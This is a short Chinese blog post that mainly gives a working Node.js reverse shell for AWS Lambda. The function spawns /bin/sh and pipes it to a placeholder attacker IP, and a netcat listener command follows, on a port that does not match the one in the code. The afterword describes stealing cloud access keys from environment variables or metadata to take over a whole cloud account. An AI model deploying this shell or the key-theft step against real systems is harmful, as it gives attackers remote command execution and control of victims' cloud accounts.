PS:文章一般都会先首发于我的个人Blog上:AWS Lambda Node.js 反弹shell ,有需要的小伙伴可以直接订阅我的Blog,获取最新内容。
0x00 前言
原本在测AWS Lambda,后来变成研究Node.js反弹shell了,hhh。
0x01 被攻击端
直接套到lambda函数里就行了
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "此处替换为攻击端IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();
0x02 攻击端
nc -lvnp 8820
0x03 后记
这就就是云服务接管比直接的服务器被控的危害更大,就是可以在环境变量或者元数据中拿AKSK,然后权限配置不当的话,可以直接控了整个云账号了。
0x04 参考链接
- 你和目标只差一个shell的距离
- AWS LambdaのOSがAmazon Linux 2に変わっていたから中身を覗いてみた